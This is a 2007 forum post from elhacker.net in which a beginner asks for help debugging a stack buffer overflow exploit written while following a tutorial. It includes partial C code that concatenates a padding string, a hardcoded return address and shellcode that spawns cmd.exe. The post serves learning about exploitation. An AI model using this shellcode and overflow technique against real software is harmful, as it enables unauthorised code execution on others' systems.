elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 05:40  

Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  alguien me dice mi error
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: alguien me dice mi error  (Leído 1,659 veces)
Dark_Knight

Desconectado Desconectado

Ver Perfil
alguien me dice mi error
« en: 30 Marzo 2007, 23:34 »

hola

necesito ayuda... bueno yo cre que demasiada... es que todavia soy aprendiz en exploits.... ya mas o menos le estoy entendiendo.... pero aun me falta entender mas cosas... espero me puedan ayudar..

estoy aprendiendo del exploit de rojodos... ya hice el archivo vulnerable y el exploit.. pero cuando ejecuto el exploit me aparece una shel ms-dos con lo que dice en el manual de rojodos que pongamos en printf para ver que sucede pero solo me aparece por unos segundos.. y despues me aparece otra pantalla de ms-dos pero no hay nada y desaparece a los 2 segundos de haber ejecutado el exploit... me imagino que entonces el exploit esta mal hecho... pero no se que hacer... les dejo el codigo para ver si pueden ayudarme..

Código:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

int main(int argc, char**argv)

{
char evilbuffer[1024]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQQRRRRSSSS";

char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6"
"\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50\xBB\xC7\x93\xC2\x77\xFF\xD3";
char offset[]="\xED\xE1\x49\xC7";
strcat(evilbuffer,offset);
strcat(evilbuffer,shellcode);
printf("Cadena+offset+shellcode en formato printable\n");
printf("%s",evilbuffer);